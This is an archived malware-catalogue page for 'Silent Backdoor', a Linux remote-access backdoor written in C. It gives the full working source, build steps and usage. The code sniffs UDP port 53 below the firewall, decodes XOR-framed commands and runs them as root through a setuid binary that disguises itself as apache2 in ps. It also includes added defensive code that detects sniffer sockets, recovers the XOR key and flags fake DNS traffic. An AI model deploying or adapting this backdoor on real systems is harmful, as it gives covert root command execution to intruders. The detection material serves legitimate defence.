Silent Backdoor

Copyright © MegaSecurity

By drraid


Information
Author drraid
Family Silent Backdoor
Category Remote Access
Version Silent Backdoor
Language C
Additional Information
-[ Packet Sniffing Backdoor Example
-[ written by drraid at gmail dot com
-[ for dtors.ath.cx & drraid's sec labs
--
-[ big middle finger to microsoft
-[ GNU GPL'd code


This is a dirty tool. A poorly written dirty tool ...
(I'm sorry there are almost no comments in it).  Just say no.
The point of this program is to demonstrate a connectionless backdoor that
gets past the local netfilter rules on a Linux box: libpcap reads from an
AF_PACKET socket, which gets a copy of every frame at the link layer before
the IP stack hands the packet to netfilter, so a DROP rule in the INPUT chain
for udp/53 does not stop the sniffer from seeing the datagram.

Many people said I was full of shit when I told them a packet sniffer 
will read packets even if netfilter drops them.  With that in mind, if
a packet sniffer were to sniff for commands, and run them as a backdoor
it could be sneaky evil ninja. No connection would be noticed, and
even if the local firewall dropped the packet containing its commands,
it would still do its duty.  Now what if you encrypted it so someone
else sniffing wouldn't know what the packet was supposed to be intended for?
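A check on the "no connection would be noticed" claim, added here as an example and not part of drraid's code: the sniffer holds no TCP or UDP socket, but it does hold an AF_PACKET socket, and every such socket is listed in /proc/net/packet with its type, protocol, interface index and inode. A running socket bound to protocol 0003 (ETH_P_ALL) on interface index 0 is the footprint libpcap's "any" device leaves; from the inode, the owning process is found by matching "socket:[inode]" among the /proc/<pid>/fd links. The table in the block is constructed sample input in the kernel's column format; the function names are this example's own.

```c
/* Added example: spot packet-capture sockets in /proc/net/packet and map
 * them to a PID.  Not drraid's code; the sample table below is constructed. */
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define ETH_P_ALL_HOST 0x0003   /* the "Proto" column is printed in host order */

/* Constructed sample in the kernel's /proc/net/packet layout.  Row 1 is a
 * cooked (Type 2 = SOCK_DGRAM) socket for every protocol on every interface
 * (Iface 0), which is what pcap_open_live("any", ...) creates; row 2 is a raw
 * ARP-only socket on ifindex 2, which is ordinary (a DHCP client, say). */
static const char sample_table[] =
	"sk       RefCnt Type Proto  Iface R Rmem   User   Inode\n"
	"0000000000000000 3      2    0003   0     1 0      0      40213\n"
	"0000000000000000 3      3    0806   2     1 0      0      40977\n";

/* Parse a /proc/net/packet table and collect the inodes of running sockets
 * that receive every protocol (ETH_P_ALL): those are sniffers.  Returns the
 * number of inodes stored. */
int find_sniffer_sockets(const char *table, unsigned long *inodes, int max)
{
	int n = 0;
	const char *line = table;
	while (*line && n < max) {
		const char *eol = strchr(line, '\n');
		size_t len = eol ? (size_t)(eol - line) : strlen(line);
		char buf[256];
		if (len >= sizeof buf) len = sizeof buf - 1;
		memcpy(buf, line, len);
		buf[len] = '\0';
		int type, iface, running;
		unsigned proto, uid;
		unsigned long inode;
		/* columns: sk RefCnt Type Proto Iface R Rmem User Inode; the
		 * header line fails at %*d and is skipped */
		if (sscanf(buf, "%*s %*d %d %x %d %d %*u %u %lu",
		           &type, &proto, &iface, &running, &uid, &inode) == 6
		    && proto == ETH_P_ALL_HOST && running)
			inodes[n++] = inode;
		if (!eol) break;
		line = eol + 1;
	}
	return n;
}

/* Walk /proc/<pid>/fd looking for a link target of "socket:[inode]".
 * Returns the PID, or -1 if no readable process owns that inode. */
long pid_for_socket_inode(unsigned long inode)
{
	char want[64], path[64], link[128], target[64];
	snprintf(want, sizeof want, "socket:[%lu]", inode);
	DIR *proc = opendir("/proc");
	if (!proc) return -1;
	struct dirent *p;
	long found = -1;
	while (found < 0 && (p = readdir(proc))) {
		char *end;
		long pid = strtol(p->d_name, &end, 10);
		if (*end) continue;                /* not a PID directory */
		snprintf(path, sizeof path, "/proc/%ld/fd", pid);
		DIR *fds = opendir(path);
		if (!fds) continue;                /* another user's process, needs root */
		struct dirent *f;
		while ((f = readdir(fds))) {
			snprintf(link, sizeof link, "%s/%s", path, f->d_name);
			ssize_t r = readlink(link, target, sizeof target - 1);
			if (r < 0) continue;
			target[r] = '\0';
			if (strcmp(target, want) == 0) { found = pid; break; }
		}
		closedir(fds);
	}
	closedir(proc);
	return found;
}

int main(void)
{
	unsigned long inodes[32];
	int n = find_sniffer_sockets(sample_table, inodes, 32);
	printf("constructed table: %d sniffer socket(s)\n", n);
	/* live check on this host: /proc/net/packet is world-readable */
	FILE *fp = fopen("/proc/net/packet", "r");
	if (!fp) return 0;
	static char table[65536];
	size_t got = fread(table, 1, sizeof table - 1, fp);
	table[got] = '\0';
	fclose(fp);
	n = find_sniffer_sockets(table, inodes, 32);
	for (int i = 0; i < n; i++)
		printf("ETH_P_ALL socket inode %lu -> pid %ld\n",
		       inodes[i], pid_for_socket_inode(inodes[i]));
	return 0;
}
```

The same listing is what `ss -0` and `lsof` read, so the check is cheap to run from an existing sensor; the "any" device also cannot be put in promiscuous mode, so the usual "entered promiscuous mode" kernel log line is not what gives this tool away.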

This tool is not written well.  It is not in its entirety and I am 
aware of several bugs it has.  I have left it this way and posted it
because it does function -- I would strongly recommend not using it
without re-writing or making changes.

Requirements:
	
	Linux (untested on other systems)
	GCC 
	libpcap and libnet


Compiling:
	
	$ ./makedoor
	$ ./makekey

*Should build two files*: silence and key

then (the file has to be owned by root for this to matter; the setuid bit is
what lets the setuid(0)/setgid(0) calls in main() succeed for a non-root
invoker):

	# chmod +s silence

Running:

	# ./silence & 


the above runs the backdoor: note it changes its process base name to: 
/usr/sbin/apache2 -k start -DSSL 

This is set by #define BASENAME in silentdoor.c.  Only argv[0] is
overwritten, so the new name shows up in ps and /proc/<pid>/cmdline; the
real binary is still visible through /proc/<pid>/exe and /proc/<pid>/comm.
Note also that the process is not daemonized: it runs as a background job of
the shell you started it from and keeps that terminal's stdout.

If anything prints on the screen when run, i.e. a '<' character, 
then the backdoor failed (probably because you weren't root: opening the
capture socket needs CAP_NET_RAW)

Using the key:

	# ./key ip.ip.ip.ip:53 "command to exec"

runs the command.  HERE'S THE CATCH:  all output is printed to the stdout 
of the remote machine.  IT IS OUTPUT ON YOUR TARGET BOX -- someone will
notice if you start causing issues.  This is one of those bugs ;D
(The backdoor never forks, detaches or redirects its descriptors, and the
command runs via system(), so the child inherits whatever stdin/stdout
silence was started with.)
Another is that if you run an interactive program like 'login' as the
command to exec, you will probably lose control of the backdoor until/if it
restarts: system() blocks inside the pcap_loop() callback until the child
exits, so no further packets are processed.
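The key tool's source is not on this page, so the datagram it sends is reconstructed here from what in_pkt() accepts: the command framed as -dc$<command>$dc and XORed with the 4-byte PASS repeated. The block below is an added example, not drraid's code, and the frame layout and function names are this example's assumptions. It builds that payload, parses it the way in_pkt does but with bounds checks (short captures, commands starting with "dc"), shows that a repeating XOR under a fixed 4-byte header is a known-plaintext problem (the first four ciphertext bytes XOR "-dc$" return the key, so "someone else sniffing" recovers it from one packet), and shows that the blob fails a basic DNS message sanity check, which is how a sensor on udp/53 tells it from real queries. The A query for example.com is constructed sample input.

```c
/* Added example (not drraid's code): both sides of silence's udp/53 exchange,
 * plus the two checks an eavesdropper or sensor runs against it.  The frame
 * layout "-dc$" + command + "$dc" is an assumption matching what in_pkt()
 * looks for; PASS is the same string the backdoor compiles in. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PASS       "leet"
#define OPEN_MARK  "-dc$"
#define CLOSE_MARK "$dc"

/* Repeating-key XOR; the same call encrypts and decrypts. */
static void xor_repeat(uint8_t *buf, size_t len, const char *key)
{
	size_t klen = strlen(key);
	for (size_t i = 0; i < len; i++)
		buf[i] ^= (uint8_t)key[i % klen];
}

/* Sender side: the payload the key tool has to put in a UDP/53 datagram.
 * Returns the payload length, or 0 if out cannot hold it. */
size_t encode_command(const char *cmd, uint8_t *out, size_t outsz)
{
	size_t om = strlen(OPEN_MARK), cm = strlen(CLOSE_MARK), cl = strlen(cmd);
	if (om + cl + cm > outsz) return 0;
	memcpy(out, OPEN_MARK, om);
	memcpy(out + om, cmd, cl);
	memcpy(out + om + cl, CLOSE_MARK, cm);
	xor_repeat(out, om + cl + cm, PASS);
	return om + cl + cm;
}

/* Receiver side, as in_pkt() does it but bounds-checked: no strstr over
 * unterminated data, no over-read on a short capture, and the closing marker
 * is searched only after the opening one, so a command starting with "dc"
 * parses.  Returns the command length, or -1 if no frame is present. */
int extract_command(const uint8_t *payload, size_t len, char *cmd, size_t cmdsz)
{
	uint8_t plain[1024];
	size_t om = strlen(OPEN_MARK), cm = strlen(CLOSE_MARK), start = (size_t)-1;
	if (len == 0 || len > sizeof plain) return -1;
	memcpy(plain, payload, len);
	xor_repeat(plain, len, PASS);
	for (size_t i = 0; i + om <= len; i++)
		if (memcmp(plain + i, OPEN_MARK, om) == 0) { start = i + om; break; }
	if (start == (size_t)-1) return -1;
	for (size_t j = start; j + cm <= len; j++) {
		if (memcmp(plain + j, CLOSE_MARK, cm) == 0) {
			size_t n = j - start;
			if (n + 1 > cmdsz) return -1;
			memcpy(cmd, plain + start, n);
			cmd[n] = '\0';
			return (int)n;
		}
	}
	return -1;
}

/* Eavesdropper side: with a fixed 4-byte header under a 4-byte repeating
 * XOR, one captured frame yields the whole key. */
void recover_key(const uint8_t *payload, size_t len, char key[5])
{
	for (size_t i = 0; i < 4; i++)
		key[i] = i < len ? (char)(payload[i] ^ (uint8_t)OPEN_MARK[i]) : '\0';
	key[4] = '\0';
}

/* Sensor side: does this udp/53 payload even parse as a DNS message?  The
 * header is 12 bytes; opcode 3 and 6-15 are unassigned; the Z bit must be
 * zero; a standard query carries one question whose QNAME is a chain of
 * 1-63 byte labels ending in a zero byte, followed by QTYPE and QCLASS. */
int looks_like_dns(const uint8_t *p, size_t len)
{
	if (len < 12) return 0;
	unsigned flags = (p[2] << 8) | p[3], opcode = (flags >> 11) & 0xF;
	unsigned qdcount = (p[4] << 8) | p[5];
	if (opcode == 3 || opcode > 5) return 0;
	if (flags & 0x0040) return 0;
	if (opcode == 0 && qdcount != 1) return 0;
	size_t i = 12;
	for (;;) {
		if (i >= len) return 0;
		unsigned l = p[i++];
		if (l == 0) break;
		if (l > 63 || i + l > len) return 0;
		i += l;
	}
	return i + 4 <= len;
}

/* Constructed: an A query for example.com as a stub resolver sends it. */
static const uint8_t sample_query[] = {
	0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
	7, 'e','x','a','m','p','l','e', 3, 'c','o','m', 0, 0x00, 0x01, 0x00, 0x01 };

int main(void)
{
	uint8_t wire[256]; char cmd[256], key[5];
	size_t n = encode_command("cat /etc/passwd", wire, sizeof wire);
	recover_key(wire, n, key);
	printf("payload %zu bytes, key from known plaintext: %s, looks like DNS: %d "
	       "(real query: %d), command: %s\n", n, key, looks_like_dns(wire, n),
	       looks_like_dns(sample_query, sizeof sample_query),
	       extract_command(wire, n, cmd, sizeof cmd) >= 0 ? cmd : "(none)");
	return 0;
}
```

The DNS check is deliberately shallow (header fields and the first question only); it is enough to separate this tool's traffic from resolver traffic, and a real DNS-tunnel detector would add entropy and label-length statistics on top of it.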

CONCLUSION:

	It is possible to have a pcap based backdoor.
	This stuff is GNU GPL'd,
	and the license is included in the folder with the sources and stuff.
	contact: drraid [at] gmail

SOURCE	
/* 

	PCAP-BASED SNIFFING BACKDOOR
	"Silent Backdoor" -- connectionless
	written by drraid, drraid @ gmail  
	
	Reads from encrypted UDP port 53 packet,
	even if the packet is dropped by local firewall >;]
	
	This is horrible code.  It functions but is buggy.  
	Meant more as a 'demo'.  Read the README

	yo sup to 503, dtors.ath.cx, syncrew, #coder-underground,
	bash, kaptin, vershun, poof, maru and other crazy bastards 

	as always, BIG MIDDLE FINGER TO MICROSOFT


*/



#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <pcap.h>
#include <netdb.h>

/* 4-byte repeating XOR key; the key tool has to use the same string */
#define PASS 		"leet"
/* what ps shows instead of ./silence (only argv[0] is rewritten) */
#define BASENAME 	"/usr/sbin/apache2 -k start -DSSL"

/*
 * pcap_loop() callback: runs once per frame that passed the "udp port 53"
 * filter.  Layout assumed: 16-byte Linux cooked (SLL) header from the "any"
 * device + 20-byte IPv4 header + 8-byte UDP header = 44 bytes, so the UDP
 * payload starts at packet+44.  IPv4 options, IPv6 or a plain Ethernet
 * capture (14-byte link header) break that assumption.
 */
void in_pkt(u_char *other_stuff, const struct pcap_pkthdr* pkt_head, const u_char* packet)
{
	int i, v;
	char *ptr1, *ptr2;
	char pktstore[1024];	/* raw (still XORed) payload */
	char tempbuf[1024];	/* keystream: PASS repeated; reused for the command */
	char decrypts[1024];	/* payload XOR keystream */

	memset(tempbuf, '\0', sizeof(tempbuf));
	memset(pktstore, '\0', sizeof(pktstore));
	memset(decrypts, '\0', sizeof(decrypts));

	/* payload length.  Known bug: a capture shorter than 44 bytes makes v
	 * negative, and the comparison below promotes it to a huge unsigned
	 * value, so 1023 bytes are copied from past the end of the packet */
	v = (pkt_head->caplen - 44);

	/* copy at most 1023 bytes so decrypts stays NUL-terminated for strstr */
	memcpy(pktstore, packet+44,  (v=(v < (sizeof(pktstore)-1)?v:(sizeof(pktstore)-1))));

	/* build the keystream by repeating the 4-byte PASS.  Known bug: for v
	 * close to 1023 the loop appends 1028 bytes into a 1024-byte buffer */
	for (i = 0; i <= (v+(v%4)); i+=4) 
		strncat(tempbuf, PASS, 4);
	/* "decrypt": the sender XORed with the same keystream */
	for (i = 0; i < v; ++i)
	{
		decrypts[i]=(pktstore[i] ^ tempbuf[i]);
	} 

	/* the command is framed as -dc$<command>$dc; anything else (ordinary
	 * DNS traffic on the port) is silently ignored */
	if (NULL != (ptr1=strstr(decrypts, "-dc$")))
	{
		/* Known bug: the search starts at ptr1, so a command beginning
		 * with "dc" matches "$dc" inside the opening marker and the
		 * length passed to strncpy goes negative */
		if (NULL != (ptr2=strstr(ptr1, "$dc")))
		{
			memset(tempbuf, '\0', sizeof(tempbuf));
			strncpy(tempbuf, ptr1+4, (ptr2 - (ptr1 + 4)));	
			/* runs as root (see main); stdout is whatever silence was
			 * started with, and pcap_loop is blocked until it returns */
			system(tempbuf);
		}	
	}

}

int catchpacket(void )
{
	char errbuf[PCAP_ERRBUF_SIZE];
	char filter_string[]="udp port 53";	/* BPF filter: only DNS-port datagrams reach in_pkt */
	pcap_t *sniff_session;
	struct bpf_program filter;
	bpf_u_int32 mask;
	bpf_u_int32 net;

	/* NULL device name: pcap_open_live treats it as the "any" pseudo-device
	 * (cooked capture on every interface); how pcap_lookupnet handles a
	 * NULL name depends on the libpcap version */
	if (-1 == pcap_lookupnet(NULL, &net, &mask, errbuf))
	{
		printf("\n<\n");	/* the only diagnostic the README mentions */
		exit(0);
	}

	/* promisc=1, no read timeout; opening the socket needs CAP_NET_RAW */
	if ((sniff_session=pcap_open_live(NULL, BUFSIZ, 1, 0, errbuf))==NULL)
	{
		printf("\n<\n");
		exit(0);
	}		
	/* return values unchecked: if the filter fails to compile or install,
	 * every captured frame is fed to in_pkt */
	pcap_compile(sniff_session, &filter, filter_string, 0, net);
	pcap_setfilter(sniff_session, &filter);
	pcap_loop(sniff_session, 0, in_pkt, 0);	/* count 0: loop forever */
	return(0);
}

int main(int argc, char *argv[])
{
	/* overwrite argv[0] in place so ps shows BASENAME; only the visible
	 * command line changes, /proc/<pid>/exe and comm still name the binary.
	 * strcpy does not check that argv[0] has room for BASENAME, so the
	 * copy runs on into whatever follows argv[0] on the stack */
	strcpy(argv[0], BASENAME);
	/* when installed setuid root (chmod +s) this makes all ids 0 so the
	 * capture socket can be opened; return values are not checked */
	setuid(0);
	setgid(0);
	catchpacket();	
	return (0);
}
